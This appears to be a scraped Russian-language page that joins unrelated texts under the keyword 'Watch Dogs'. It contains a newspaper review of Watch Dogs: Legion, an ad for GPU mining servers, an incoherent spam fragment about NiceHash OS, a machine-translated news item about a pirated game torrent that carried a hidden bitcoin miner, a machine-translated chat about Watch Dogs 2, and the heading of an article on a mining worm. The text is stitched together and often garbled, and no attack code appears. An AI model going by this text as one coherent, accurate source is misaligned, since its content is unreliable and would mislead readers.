Legion. Это полный провал — Российская газета
Watch Dogs среди прочих франшиз Ubisoft всегда стояла особняком. Первая часть, представленная на E3 2012, ошеломляла запредельной на тот момент графикой и «живостью» открытого мира. Уже после первой презентации она получила от профильной прессы нестыдный ярлык «Убийцы GTA», а издатель в ходе громкой промо-кампании всячески пытался поддерживать подобные сопоставления.
Потом же были череда не менее громких даунгрейдов, прохладный прием и средние оценки, которые, впрочем, не помешали случиться сиквелу, поправившему большую часть проблемных моментов. Но сравнивать вышедшую Watch Dogs: Legion следует не с ним, а именно с оригинальной игрой.
Она также вышла на стыке консольных поколений и была стратегически важна для Ubisoft — первые «Сторожевые псы» задумывались не столько как конкурент культовой серии Rockstar Games, а как Assassin’s Creed в современном сеттинге.
Фото: Богдан Бобров/РГ
И вот теперь можно сказать, что по очень многим пунктам Legion проигрывает своей спорной прародительнице, но обо всем по порядку.
Сперва немного о сюжете, который практически во всех играх Ubisoft последних лет был не самой сильной стороной.
Недалекое будущее, в Лондоне запустили третью версию ctOS — операционной системы, которая управляет всеми отраслями города — эдакий муниципальный Windows. Как это водится, что-то идет не так, в британской столице раздается череда взрывов, в которых обвиняют хакерскую группировку DedSec. Власть переходит к военной организации, члены которой бьют людей на улице и продают мигрантов на органы, и вот с этим бардаком игрок должен что-то сделать.
Экран выбора первого агента
И тут можно было бы рассказать о крутом главном герое, за которого нам дали поиграть, но не получится — и это, к сожалению, главная фишка игры, продвигавшаяся с первого анонса. В игре попросту нет протагониста — «освободить Лондон» может любой завербованный агент DedSec. В этом плане Legion потеряла лицо, причем буквально.
На старте предлагается выбрать первого рекрута. На каждого из них есть короткое досье, иногда с парой забавных фактов. Но дальнейшего развития выбранный вами персонаж не получит. Например, у одной из моих подопечных в описании было сказано, что суд пожизненно запретил ей посещение зоопарка. И нигде в будущем вы не найдете информации, что за этим стоит и что она там сделала.
В итоге вы играете отрядом бездушных болванчиков, за которых не особо понятно почему надо переживать. После выполнения определенной миссии одному из моих DedSec-овцев позвонили и сказали, что его боевого товарища среди бела дня запихали в машину злые люди и увезли в неизвестном направлении, и теперь надо, мол, кинуться его спасать. И имя его называют. А проблема в том, что я вообще не понимаю, про кого идет речь. Захожу в меню выбора команды и вижу, что да — был такой, одно задание с ним еле-еле выполнил, не очень он мне нравился, поэтому пусть посидит пока у злодеев, ничего страшного.
Маски жителям Лондона раздают бесплатно, но народ все равно недоволен
В оригинале главным героем был Эйден Пирс с набором эмоций Grumpy Cat, его в числе прочего тоже активно критиковали в 2014 году, но у него были четкие мотивации, цели и реакции на происходящее.
Отсюда еще и возникает лудонарративный диссонанс — понятно, к примеру, почему фитнесс-тренер наравне дерется со спецназом, прописывает с вертушки, паркурит по крышам и т.д. Но почему этот же акробат блестяще управляется с гаджетам, удаленно взламывает сервера и на ходу из машины отключает дроны преследования? Эта игровая условность рушит вообще всю серьезность происходящего.
Возможно, из-за этого у игры практически нет интересных катсцен и вменяемой постановки. Диалоги из-за рандомности участников всегда очень схематичны и скучны. Потому что нельзя написать интересные беседы, если неизвестно кто с кем будет разговаривать.
Типичный разработчик игр, по мнению Ubisoft
Отсюда также следует, что пропала прокачка этих самых «героев» — есть только общая схема улучшения технологий — можно сделать пистолет бесшумным, научиться обходить защиту отдельных типов дронов и т. д. А каждый из рекрутов имеет строго закрепленный за ним набор активных и пассивных навыков. Например, мировой судья помогает выпустить пойманных агентов из заключения, врач сокращает время реабилитации раненых, хакер лучше обращается с компьютерами. Есть даже отдельные кадры с вредными наклонностями — некоторые спускают заработанные вами деньги в азартных играх, вторые склонны к суициду, а третьи вообще не могут бегать или прятаться.
Из-за невозможности развить кого-то одного из своих бойцов отсутствует всякое чувство прогрессии. Эйден Пирс, опять же, ближе к финалу игры, со вкачанными на максимум навыками становился настоящим воплощением кибер-смерти. Он мог устроить на улицах Чикаго формальный и буквальный (запуская блэкаут) конец света, взрывая на дорогах подземные отопительные трубы, сваливая в кучу с помощью взлома светофоров автомобильный трафик, разбрасывая по округе взрывчатку и блокируя специальным гаджетом вызов подкрепления неприятеля.
В Legion можно прокачать дрона-паучка, чтобы он выше прыгал и быстрее бегал…
Задания получаются в уютной обстановке, на удобном диванчике
Да и сам процесс вербовки отличается исключительной унылостью и со временем превращается в рутину. Одних достаточно спасти от ареста, сняв на улице наручники и отбив у жестоких слуг правопорядка. Для других же все выливается в череду нудных поездок в разные концы города: «У плохих ребят есть на меня компромат, сотри его, а после езжай на другую окраину и накажи их».
При этом игра никак не мотивирует и не поощряет за набор команды. По большому счету, вышеупомянутым физруком вполне можно пройти большую часть кампании, переключаясь на рабочего со стройки для преодоления высоких препятствий. В ключевых сюжетных местах вас, конечно же, заставят нанять кого-то со специфическими талантами, но после выполнения задания можете к нему больше не возвращаться.
Наемного убийцу с ганкатой в стиле Джона Уика и других колоритных персонажей, которых широко рекламировали и рассказывали о том, какие они классные и уникальные, дают за освобождение районов Лондона. Для этого снова нужно выполнить ряд несложных, но муторных поручений, то есть, опять же, можно обойтись и без них.
Зачем-то сделан режим с «окончательной смертью» — когда в случае гибели нет возможности вернуть агента, и после кончины последнего игру придется начинать заново. Может быть, это было сделано в расчете на хардкорную аудиторию, но тогда где для нее специальный трофей или достижение за прохождение в этом режиме?
И вот в этом во всем Watch Dogs: Legion — в ненавязчивой необязательности. Взять почти любой аспект — и он будет «не докручен», «не доделан» и «а можно и без него как-нибудь».
Стелс — примитивный и одноклеточный. Сэм Фишер от такого где-то нервно плачет, обняв себя за коленки.
Езда на транспорте до сих пор напоминает гонку утюгов с соответствующей физикой. К каждой машине тут прикрутили автопилот, но то, как он реализован — это ночной кошмар Илона Маска.
Стрельба просто несуразная и какая-то «ватная». Стволов у разных персонажей попадается много, но баллистика у них отличается чуть менее, чем никак.
Лор раскрывается в игре через аудиозаписи и текстовые документы. И это ужасно. Из всех имеющихся повествовательных инструментов Ubisoft выбрали именно такой способ больше рассказать геймеру об окружающем мире. В ходе очередной заварушки находятся наушники, и игра на паузе начинает воспроизводить запись радиоэфира, мол, «подождите, не стреляйте в меня, сейчас я послушаю, как здесь ведущие о теракте высказались».
И раз уж речь зашла о радио, то оно тут под стать всему остальному — какие-то безликие голоса пытаются остросоциально шутить, но комики из них получаются так себе.
Также хотелось бы сказать пару слов о локализации. Во-первых, она имеется в виде полного голосового перевода, а также есть выбор сочетания субтитров и озвучки — и это, однозначно, плюс. Обычно принято ругать отечественных артистов, — мол, они где-то не доиграли, а где-то переврали, — но в случае с Watch Dogs: Legion все нормально. Просто качество оригинальной озвучки оставляет желать лучшего, а наш Бэгли (местный Google Assistant) так и вовсе вышел более живым и характерным, хоть и по понятным причинам растерял часть британского шарма.
Лицевая анимация выполнена на уровне Mass Effect: Andromeda — общаются как будто не живые люди, а бездушные роботы.
Интерфейс в игре жутко перегружен и, кажется, пришел прямиком из середины нулевых. В параметрах даже есть отдельный пункт для его настройки — но разве этим должен заниматься игрок?
Что же касается технического исполнения, то с ним тоже не все однозначно. FPS на стандартной PS4 провисает в первой же катсцене, но во время геймплея это ощущается не так сильно. Временами заметно лагает звук. Периодически игра крашится в синий экран.
Фото: Богдан Бобров/РГ
Да и в целом попадаются мелкие баги, вроде «прыгающих» и «проваливающихся» в асфальт автомобилей.
Возможно, виноваты в этом разработчики лишь частично — игра 2020 года вполне сносно работает на консольном железе 2012-го и это уже, наверное, небольшой, но успех.
Общая же картинка выглядит прилично, а художники и дизайнеры, воссоздавшие интерактивный Лондон, проделали колоссальнейшую работу — в этом, конечно, Ubisoft большие молодцы.
Лондон прекрасен
Надо бы написать пару слов о сетевом режиме, но сделать этого не получится. Запустят его только в декабре, когда, может быть, в игре уже никого и не останется.
Подводя итог, хотелось бы сначала вспомнить о геймдизайнере Патрисе Дезиле, стоявшем у истоков первых двух номерных частей Assassin’s Creed. В одном из интервью он взял на себя вину за изобретение геймплейной механики «вышек», которая по-своему «сломала» игровую индустрию.
Так вот Watch Dogs: Legion представляет собой на данный момент пиковое исполнение этой злосчастной концепции — в роли вышек здесь совсем другие элементы, но суть остается прежней. Тонны, просто огромное количество контента, активностей и прочего. Это значительно повышает реиграбельность — что бесспорно. Вот только играть в такое не хочется — игра скучная и неинтересная.
8 преимуществ ACD Crypto и новые возможности в майнинге GreenTech_Reviews
ACD Crypto: 8 преимуществ ACD Crypto и новые возможности в майнинге
В настоящее время майнинг развивается очень большими темпами, все больше людей хотят влиться в это направление заработка. Но не у всех есть возможности делать это в удобных условиях и удобном оборудовании.
Теоретически процесс перебора возможных вариантов блоков может происходить на любом компьютерном оборудовании, но в реальности скорость майнинга напрямую зависит от мощности техники. Фермы криптовалют могут состоять из совершенно разных комплектующих: видеокарт, процессоров, жестких дисков, специального оборудования, созданного исключительно для майнинга.
ACD Crypto, это готовое решение и отличный способ майнить без лишних проблем.
8 преимуществ ACD Crypto
— Готовое решение;
— Габариты, возможность установки в серверную стойку;
— Сквозная производительная система охлаждения;
— Высокая вычислительная плотность;
— Специально подобранные видеокарты;
— Возможность установки «WATCHDOG».

— Конкурентоспособная цена.
Простыми словами, ACD Crypto включает в себя материнскую плату, множество мощных видеокарт и системой охлаждения (несколько винтеляторов) обрамленных в каркас (блок).
Мы предоставляем к вашему вниманию 2 вида сервера ACD Crypto:
Сервер ACD Crypto Compact ( на 6 и 8 видеокарт)
ACD Crypto Compact является малогабаритным и эффективным решением за счет использования специальной материнской платы, исключающей из системы использование райзеров (удлинителей-переходников для разъемов PCI-E) За счет шести близко расположенных к видеокартам вентиляторов конфигурация позволяет снимать пластиковые кожухи с видеокарт, которые препятствуют эффективному отводу тепла в условиях высокой плотности видеокарт (много видеокарт рядом) В таком случае тепло снимается с радиатора и сильным воздушным потоком моментально выводится наружу. Специально для этого подбираются видеокарты с горизонтальным расположением ребер радиатора. В ACD Crypto Compact используется эффективный блок питания серверного формата, выводящий только 12 вольт, а преобразование для прочих нужд материнской платы происходит уже на ней.
Ключевые характеристики:
— Riserless machine with 2000W PSU: Intel Dual Core processor, 8GB memory, 60GB SSD, WatchDog
— СИСТЕМА ОХЛАЖДЕНИЯ : 6x 125mm Fan (3-Front, 3-Back)
— ГАБАРИТЫ : 437 x 381 x 165 мм.
Сервер ACD Crypto Rack 19 ( на 6 и 8 видеокарт)
ACD Crypto Rack имеет габариты аналогичные габаритам 4U сервера, что дает возможность установки его в серверную стойку. По аналогии с Crypto Compact подбираются видеокарты с горизонтальными ребрами для обеспечения максимально эффективного отвода тепла. Установлено шесть производительных вентиляторов, но в данном экземпляре видеокарты подключаются через PCI-E райзеры. Также на материнскую плату устанавливается Watchdog, который позволяет автоматизировать процесс перезагрузки системы в случае зависания, настроить его можно в операционной системе установив соответствующую программу.
Ключевые характеристики:
— 4U, 19″ (cant use rails) machine with 2000W PSU 8xGPU: Intel Dual Core processor, — 8GB memory, 60GB SSD, WatchDog
— СИСТЕМА ОХЛАЖДЕНИЯ : 6x 125mm Fan (3-Front, 3-Middle)
Фермы ACD Crypto представлены дистрибьюторской компанией 3Logic.
Ссылка для ознакомления: https://3logic.ru/?A=C&CS=109
Nicehash os wifi
Nicehash os wifiSkip to main content
Nicehash os wifi
nicehash os wifi This code will help you identify notification emails coming from NiceHash. There are a few applications that allow you to use NiceHash on Linux. A. WIFI Coin. 11b/g WiFi Adaptador de red: NIC de Gigabit de Ethernet PCI-E de la familia Realtek RTL8168C(P)/8111C(P) (NDIS 6. PLACES TO CHECK OUT System configuration NiceHash OS configuration prepared while creating NiceHash OS flash drive is located under /mnt/nhos direc- NiceHash OS 1. when it reaches a certain figure it pays out automatically to my desktop wallet. A wallet is a program that sits on your computer and gives you a wallet address, this is a unique string of numbers and letters that you will use to receive bitcoins. This is visible from your Nicehash account. Apr 09, 2019 · I have a Gigabyte Aorus Master (rev 1. In testing I did notice that mining Ethereum using Nicehash the hash rate was 27.













.png.2792e4385a454106e5e43aa9f5292913.png)


Десятки тысяч пиратов «Сторожевых псов», ЗАПРЕЩЕННЫЕ мастером биткойнов • Реестр
Десятки тысяч пиратских игроков были порабощены ботнетом Биткойн после загрузки взломанной копии популярной игры Watch Dogs .
Торрент с зараженным заголовком, с которого якобы снята защита от копирования, имел почти 40 000 активных пользователей (сидеров и читателей) и был загружен еще 18 440 раз 23 мая только на одном сайте.
Pirates сообщили на интернет-форумах, что торрент-пакет, маскирующийся под популярный торрент-бренд SkidRow, незаметно установил биткойн-майнер вместе с рабочей копией игры.
Майнер Windows работал с двумя исполняемыми файлами, установленными в папке AppData \ Roaming \ OaPja, и заметно замедлял работу низкопроизводительных машин, потребляющих до четверти мощности процессора.
Большинство источников удалили вредоносный торрент. Еще предстоит провести анализ, чтобы определить местонахождение или личности участников атаки.
Геймеры были предпочтительной мишенью для злоумышленников, занимающихся майнингом биткойнов, потому что они часто использовали высокопроизводительные графические процессоры (GPU) и избегали ресурсоемких антивирусных платформ.
«Если вам случится загружать взломанные игры через Torrent или другие службы обмена P2P, есть вероятность, что вы станете жертвой [] прибыльного трояна, связанного с настоящим майнером GPU», — сказал главный стратег BitDefender Каталин Косой о раннем майнере биткойнов. это нацелено на игроков.
«Мы советуем вам начать проверку вашей системы на наличие признаков заражения, особенно если вы постоянно теряете количество кадров в секунду».
Использование украденных рассредоточенных вычислительных ресурсов было одним из немногих способов заработать приличные деньги, анализируя все более сложные математические алгоритмы, необходимые для заработка биткойнов.
Преступники в последние годы навязали ресурсоемким биткойн-майнерам множество атак, нацеленных на ценные высокопроизводительные графические процессоры, вплоть до смехотворно медленных цифровых видеомагнитофонов.®
Что нам понравилось и не понравилось в Watch Dogs 2
Трое из нас в штате играли в Watch Dogs 2 . Двое из нас закончили это. Мы подумали, что это хорошее время, чтобы поговорить о хорошем и плохом в игре. Было о чем подумать! Бонус: мы могли случайно зайти в дискуссию о том, почему одному из нас очень и очень трудно угодить.
Стивен Тотило: Гита и Кирк, я закончил рассказ Watch Dogs 2 .Я выполнил его основные задания и побочные задания. Я собрал много коллекционных предметов и опробовал множество нарядов для Маркуса Холлоуэя, но не нашел ни одной, которая, казалось бы, ему идеально подошла. Я хорошо провел время, но не очень хорошо. Я до сих пор не понимаю, почему. Вы оба играли, верно? Как далеко вы зашли и испытываете ли вы смешанные чувства по поводу этой игры?
Гита Джексон: Я все еще довольно рано начинаю рассказывать историю, потому что я понял, что все, что я действительно хочу, — это тусоваться в этом виртуальном Сан-Франциско с домашними собаками.
Но я много возился и покупал новую одежду — на самом деле это самая первая подобная игра, в которой я понимаю, что значит просто наслаждаться гигантским ящиком с игрушками, который тебе дали, может быть, даже больше, чем история, которую ты были представлены.
Кирк Гамильтон: Я закончил рассказ и множество побочных квестов для своего обзора, хотя я переигрывал на ПК. Мне было интересно подходить к этому так, как ты говоришь, Гита, хотя иногда я обнаруживал, что игровые системы недостаточно надежны, чтобы поддерживать тот вид экспериментов, который я хотел бы проводить.Типа, он в основном предназначен для того, чтобы делать то, что он вам говорит, весело, но вы не можете выйти за рамки этого?
Стивен: Это определенно позволило мне поэкспериментировать! И под экспериментом я подразумеваю: использовать очень мощный специальный прием «Сделать-все-телефоны-вызвали-разом-разом», а затем просто пробежать через комнату, полную врагов, к выходу.
Watch Dogs 2 поразила меня как игра, застрявшая между тем, что она может быть с точки зрения игры о взломе технологий города, и тем, что требует Закон о видеоиграх с точки зрения наличия комнат, полных плохих парней , все из которых имеют право получить пулю в случае необходимости.
Я в основном просто хотел взломать что-нибудь и заставить всю электронику вокруг меня выполнять мои приказы.
Гита: Я согласен со Стивеном здесь. Были моменты, когда я чувствовал, что игра позволила мне искренне почувствовать и _ быть_ умным с тем, как я играл с хакерством. Но я также чувствовал, что в игре есть другая, вторая часть, которой я изо всех сил старался не увлекаться, но все еще присутствовал, вырисовываясь. А именно перестрелки, которые казались навязчивыми и выходящими за рамки характера.
Все, что мне не нравится в этой игре, вращается вокруг частей, в которых нужно стрелять в людей.Я как бы боюсь увидеть Маркуса с пистолетом в руках? Даже смотря видео других людей, я думаю: «О боже, нет, он бы никогда этого не сделал!»
Стивен: Верно, но игра позволяет пропустить стрельбу. Тебе не нужно этого делать. Дизайнеры предлагают вам множество способов пройти уровни, никого не стреляя, даже если они упорствуют, как я уже говорил, наполняя свои уровни вражеским ворчанием. Кирк знает, что по своей ошибке я погружаюсь в побочные квесты игры и часто не могу получать удовольствие от игры, если в ней нет хороших побочных вещей.Я уверен, что кто-то может написать обо мне психологический портрет на основе этого, но, ища корень своих смешанных чувств по поводу игры, я задаюсь вопросом, а не стрельба ли меня подвела.
Kirk: Что касается оружия, я вижу это по-разному.
Стакан наполовину заполнен, эта игра демонстрирует, что она не могла дать нам никакого оружия и все же была действительно веселой и интересной игрой. Я помню, Стивен, когда вы писали о той первой демонстрации E3 первых Watch Dogs .На пару волшебных минут мы все подумали, мужик, а разве в этой игре нет оружия? Вторая игра довольно четко продемонстрировала (на мой взгляд), что такая игра с открытым миром класса AAA, как эта, не «нуждается» в оружии, чтобы быть интересной, и это хорошо.
Стеклянная полупустая версия, ох, действительно неприятно видеть, как Маркус вытаскивает пистолет и стреляет в людей. Такой уровень насилия настолько расходится с тем, кто, как мы знаем, есть Маркус и что он собой представляет. Также странно неприятно представить, как его беспечные приятели подписывают его, направляясь убивать подрядчиков службы безопасности и гражданских лиц.
Обычно я вижу стеклянную полуполную версию, тем более что я изо всех сил старался играть не смертельно. Но я считаю, что оружие представляет собой упущенную выгоду — если бы они не предоставили нам кучу вариантов убийства людей, возможно, мы могли бы получить более интересные возможности для взлома и иного манипулирования окружающей средой.
Стивен: Мне интересно, не беспокоили ли меня побочные вещи, понимаю ли я, что, пытаясь сохранить игровой процесс WD2 более тематически и механически согласованным, они ограничили диапазон забавных или интересных вещей, которые вы могли делать.В предыдущей игре мы могли заставить нашего главного героя надеть очки дополненной реальности и стрелять в «виртуальных» инопланетян в небе. Мы могли взбираться на здания в гигантском аквариуме с пауками или совершать своего рода поездку с наркотиками и прыгать с одного гигантского цветка на другой.
В этой игре мы не выполняем побочные квесты, связанные с наркотиками. Мы взламываем банкоматы и решаем, кредитовать или снимать деньги с людей, которые останавливаются у банкоматов, пока мы взламываем. Мы забираемся на крыши, чтобы красить здания краской. Мы находим и взламываем узлы данных в бедных районах Окленда, которые используются для увеличения счетов людей, чтобы они могли вывести цены из облагораживаемых районов.Обертка f Watch Dogs 2 намного глупее, чем WD1 , но игровой процесс на самом деле намного серьезнее и поэтому мне кажется более ограниченным.
Я думаю, что это могло быть то, что меня беспокоило, хотя я ценил, насколько дизайнеры и сценаристы игры пытались использовать все побочные вещи, чтобы говорить о проблемах реального мира и обосновывать вещи в реалистичных взаимодействиях.
Вверху: необычная цветочная миссия из первой игры.
Kirk: Забавно, что «дурацкие» вещи из первых Watch Dogs не появились в явно более дурацком продолжении, где они подошли бы лучше.
Стивен: Кирк, ты избегаешь позиции по поводу того, должны ли в этой игре быть странные миссии с наркотиками, в которых ты отскакиваешь от гигантских цветов?
Kirk: Мне запомнились те побочные миссии с гигантскими цветами, которые на самом деле были не очень веселыми. Я определенно был бы за добавление странных побочных миссий, если они действительно веселые.Вторжение роботов было забавным, если я правильно помню…
Gita: Я чувствую, что игра пострадала бы от перегрузки сумасбродства, если бы в этой игре были триповые отскоки цветов. Я определенно перебрал всю эстетику DedSec и то, как они разговаривают, и маску-смайлик Ренча, но это заняло некоторое время. Почему-то мне легче принять этот китч в более приземленном Сан-Франциско.
У меня также были проблемы с WD1 ‘s Chicago, в общем, так что это могло быть моей проблемой.
Неудобно, если не считать Стивена, добавленного при редактировании стенограммы
В конце 2014 года с помощью Кирка я написал статью под заголовком «Наш список желаний Watch Dogs 2». В нем я сказал о побочных квестах:
Лучшие побочные квесты. Нам не нужна мини-игра в шахматы в Watch Dogs. Черт, хотя это было весело, нам также не нужна мини-игра с танком-пауком. Нам нужны хорошие побочные квесты, которые действительно имеют смысл в контексте игры. Итак: взлом, проникновение, анализ данных и тому подобное.Сделайте их забавными, сделайте их достойными того, чтобы они делали их самостоятельно, и заставьте их чувствовать себя связанными с остальной частью игры.
Дизайнеры игры сделали практически все, о чем мы с Кирком просили. И все же здесь мне сейчас не хватает дурацких миссий из WD1 . Как мне примирить это? Кирк был прав в этом разговоре. Цветочные миссии в WD1 были не очень увлекательными. А побочные миссии в этой игре намного более логичны в контексте контекста. Они менее удивительны и менее различимы с точки зрения игрового процесса.То, что мы делаем в побочных миссиях Watch Dogs 2 , мы делаем в основных миссиях. Возможно, проблема в этом, а может, и нет. В любом случае, благодарим Ubisoft за то, что выполнили все, о чем мы просили! А теперь вернемся к чату.
Kirk: Помогло то, что им удалось реально развить персонажей в ходе игры. Например, если я вижу в них людей, с которыми можно иметь отношения, я могу обойти много глупых вещей DedSec. Например, я думал, что миссия, в которой похищают Ренча, прошла очень хорошо.
Стивен: Да, и есть некоторая … глупость не было бы правильным словом … но в основных миссиях есть кое-что действительно творческое. Спойлеры для Gita, но к концу игры вы взломали роботов и спутники и проникли в китайские грузовые суда и саудовские серверные фермы. Это круто. Но я был шокирован тем, что в одном из игровых автоматов в штаб-квартире DedSec нет даже глупых мини-игр. Очень странно.
В любом случае, мы все согласны с тем, что главный герой и основной актерский состав второго плана — это шаг вперед, да?
Кирк: О, конечно.
Гита: Я их очень люблю. Всем сердцем.
Кирк: Мне очень, очень нравится Маркус. Даже один из моих любимых игровых персонажей года.
Стивен: Я ожидал, что возненавижу Ренча. Как игра закончилась тем, что я не возненавидел его?
Gita: Я очень, очень ненавидел его за все предварительные просмотры. Эта маска смайлика! Но как только я увидел, как сильно его любит Маркус, я просто растаял.
Стивен: Просто показывает, как нельзя судить о хакере по его маске смайлика.
Kirk: Да, я действительно думаю, что то, как они ответили «почему Ренч носит маску», было близко к идеальному. Это было тонко, и многое осталось недосказанным. Мы все знали о сделке.
Стивен: Кирк, тебе понравился Маркус? Думаю, я ценил его, но, как и многие главные герои игр с открытым миром, он казался достаточно мягким, чтобы быть частью любой основной миссии или случайным образом выполняемой побочной миссии, и поэтому взял на себя больше роли удаленного наблюдателя, чем реального персонажа. .
Kirk: В том, как Раффин Прентисс сыграл его, есть определенная теплота, которая мне очень понравилась. Он такой хороший лидер, и я обычно люблю персонажей, которые с энтузиазмом поддерживают людей вокруг них. С Маркусом нет ничего особенного, просто то, что накопилось у меня со временем. Шутка здесь, шутка там. Даже его мокасина и язык тела.
Стивен: Я это вижу.
Gita: Он сразу напомнил мне моего старшего брата в подростковом возрасте.И немного моего отца. Для меня многое из этого было в шапочке. Мне очень нравится анимация, в которой Маркус примеряет одежду (можете ли вы сказать, где я провел много времени в этой игре?). Конечно, были моменты, когда я хотел, чтобы он остановился и _пустил меня посмотреть на эту чертову одежду_, но иногда, когда вы одеваете его в действительно хорошей одежде, вы чувствуете, что этот персонаж действительно думает: «Посмотри, какой я свежий».
Это его уверенность, которая действительно пронизывает меня. С Маркусом случаются плохие вещи — конечно, случаются, именно так работают истории, — но Маркус не такой персонаж, который определяется его травмой, как Эйден Пирс.
Стивен: Я был сбит с толку, Гита, всеми вариантами гардероба Маркуса. Как вы заметили, Ubisoft разработала для него действительно стильную одежду. Но варианты мешали моему представлению о том, как я должна его одевать. Обычно я одеваю своих игровых персонажей разумно. Я просто не могу смириться с тем, что они выглядят как тупицы, когда появляются в кат-сценах в нестандартной клоунской одежде. Поэтому неудивительно, что я играю прямо. Большая часть одежды Маркуса довольно реалистична, и вы можете увидеть вещи, которые носят несмешные люди.И все же … я не уверен, что Маркус, хакер, который иногда стреляет из оружия и определенно много лазает, был больше похож на парня в костюме, парня в узких хипстерских штанах, парня в футуристической паркуровой одежде или что-то в этом роде.
Kirk: У меня была эта проблема больше в первый раз, и я думаю, что в основном я просто оставил его в его единственном стартовом наряде DedSec. Во второй раз я просто попыталась одеть его как можно более стильно, и это было очень весело.
Chance The Rapper, из интервью H&MChance The Rapper, из интервью H&M
Gita: Я пытался одеть его в одежду, которую будет носить Chance the Rapper.Они похожи на парней!
Стивен: «Максимально стильно» = вы получили его в пальто Эйдена Пирса, верно, Кирк?
Кирк : Не знаю, готов ли я стать таким культовым. Это так знаково.
Gita: Вся лицензионная музыка была великолепна, но для этого требовалось немного Чано.
Стивен: Я в основном слушал рэп-станцию. Что еще было хорошего?
Кирк: Да, мне очень нравилась музыка. По этому показателю намного лучше, чем WD1 .В частности, мне понравилось, что они начали с какой-то Tower of Power, оригинальной группы из Окленда.
Gita: Рэп-станция была по преимуществу. Панк-станция оставляла желать лучшего, имо. В ту минуту, когда я услышал «Bank Rolls (ремикс)» Тейта Кобанга, я немного испугался. Моя машина чуть не разбилась, пытаясь достать поддельное приложение Shazam и забрать его.
Kirk: Я не особо разбираюсь в EDM и другой электронной музыке, но мне тоже очень понравилось DedSec Radio.Мне понравилось, когда они играли Эрика Б. и Ракима в наушниках Маркуса во время миссии — у меня было дежавю, раз уж я думаю, что Ubisoft продемонстрировала эту миссию на E3? Хорошее дерьмо в любом случае.
Gita: Мне кажется, что эта игра кажется намного более сплоченной, чем WD1 , но это означает, что мы упускаем более экспериментальные сторонние вещи, которые нравились Стивену. Но действительно здорово видеть игру, в которой все рассчитано на то, что хочет персонаж, а не для гипотетического игрока.Одежда — это то, что хотел бы Маркус, а музыка — это то, что Маркус любит. Из-за этого он чувствует себя настоящим парнем. Это очень тщательно отобранная игра.
Кирк: Это интересный способ выразиться. Я понимаю, о чем вы говорите.
Стивен: Да, мне это нравится. Это умно и напоминает мне, как, скажем, мне очень понравилось, как в L.A. Noire был ненадежный главный герой, который в итоге делал то, что хотел, а не то, что вы от него хотели.
Но позвольте мне переключить внимание на вас, потому что мы зашли так далеко и еще не в восторге от дронов и багги.Наверное, потому, что я так сварливо начал этот разговор, пытаясь понять, что мешает мне полюбить игру.
Мне очень понравились дрон и багги. Игровая возможность использовать их для наблюдения за любым вызовом, который вам предстоит решать, казалась очень современной. Большинство задач в игре связаны либо со скрытностью, либо с платформером. Я считал преимуществом иметь дрон, который можно использовать для сканирования уровня, который вы хотите пройти. Мы видели это в играх раньше, хотя и не так хорошо, как в этой.Однако я не думаю, что когда-либо видел возможность использовать дрон для разведки платформеров. Это моя любимая вещь в игре, которая, как я считаю, намекает на совершенно новый поворот в трехмерных платформерах. По сути, идея тактического платформера, в котором вы можете смотреть вперед, а половина игры состоит в том, чтобы выяснить, каким будет маршрут, прежде чем вы отправитесь на него. Я любил это.
Gita: Я довольно своенравный игрок во все видеоигры, и дрон и багги очень меня успокаивают.Я также (извините, вы все) плохо разбираюсь в видеоиграх и тревожный человек, но мне предоставлена возможность просто трахаться внутри пространства миссии с единственной реальной угрозой для пластиковой игрушки для повторной печати. так меня успокоил.
Кирк: Я тоже любил дронов. Я говорил об этом в своем обзоре, но для меня это было почти как эволюция двух- или трехсимвольных миссий GTA V . В более стратегических играх Tom Clancy от Ubisoft уже давно есть дроны и багги, но эта концепция действительно подходит для такой игры с открытым миром, как эта.
В качестве примечания: вчера я был в торговом центре и не понял, что такое четырехроторные беспилотники в этом году. В каждом магазине игрушек было представлено около 10 различных моделей!
Gita: Моя мама думала, что мне подарить. Могу я принести его в офис, Стивен?
Стивен: Только если он будет предшествовать вам, когда вы переходите от точки укрытия к точке укрытия, чтобы добраться до своего стола, Гита.
Не упоминается в нашем чате, но это одна из самых крутых вещей в игре: возможность внезапного появления других игроков в вашей игре, когда их преследуют полицейские.На этом кадре я схватил собственную полицейскую машину и собираюсь их сбить — СтивенНе упоминается в нашем чате, но одна из самых крутых вещей в игре: возможность внезапного появления других игроков в вашей игре, когда их преследуют полицейские. На этом кадре я схватил собственную полицейскую машину и собираюсь их сбить — Стивен
OK. Молния раунд. Не нравится Driver SF?
Кирк: Недурно… полагаю.Я не люблю вождение в игре, но мне нравятся миссии такси в открытом мире. Я оценил, что все те, которые я написал, тоже были небольшими мини-рассказами.
Гита: палец вниз
Стивен: А как насчет селфи на Foursquare? Вверх или вниз?
Kirk: Мне это понравилось, хотя я видел, как люди думали, что это утомительно. Я в основном копаю это, потому что я так долго жил в Сан-Франциско и мне нравится искать все мелочи, которые они воссоздали.
Gita: Эхххххх Я поставлю вам оценку, потому что мне просто так нравилось делать селфи в игре.
Стивен: А гонки на парусных лодках? Насколько вам, ребята, нравились гонки на парусных лодках?
Gita: пердеж, шум, точка mp3
Кирк: Ха-ха. Я их еще не делал! Я бы хотел, если бы только посмотреть, сколько пиратского парусного спорта Ubi удалось влезть в эту игру.
Стивен: О, если бы это было так. Это не.
Кирк: Никаких лачуг?
Стивен: Нет. Но, эй, чем больше мы говорим об этой игре, тем больше я понимаю, сколько частей в ней мне понравилось.Так что, возможно, когда я остановлюсь на этом, я обнаружу, что размышляю о нем более позитивно.
Этот чат заставил меня подумать, по крайней мере, об одной вещи, которую я не смог оценить во время игры, но теперь признаю забавной особенностью: вы можете купить сувенирную рубашку в каждой важной области игры, в которую вы заходите (Nudle (Google ) HQ, Алькатрас и т. Д.). Это было умно! Я бы хотел, чтобы другие игры украли это. В какой-нибудь будущей игре Марио Марио может быть одет в рубашку «Я только что посетил ледяной мир» или что-то в этом роде.Что ж, может быть, не это, но это одна из многих хороших идей в этой игре. Так что… я думаю, мне все-таки нравится! Кирк и Гита, спасибо за то, что помогли мне понять мои чувства.
Кирк: Я всегда готов помочь вам разобраться в своих чувствах по поводу побочных квестов, Стивен.
Гита:
Chance The Rapper, появившийся в GQChance The Rapper, как он появился в GQ
Распространение сторожевых псов для взлома баз данных Mining Worm по всей стране: проблемы и меры противодействия
В этой статье анализируется майнинговый червь Watchdogs и даются предложения по аварийному реагированию и дальнейшему предотвращению подобных крупномасштабных вторжений.
Авторы: Fan Wu, Weibo Guo и Fengwei Zhang
Введение
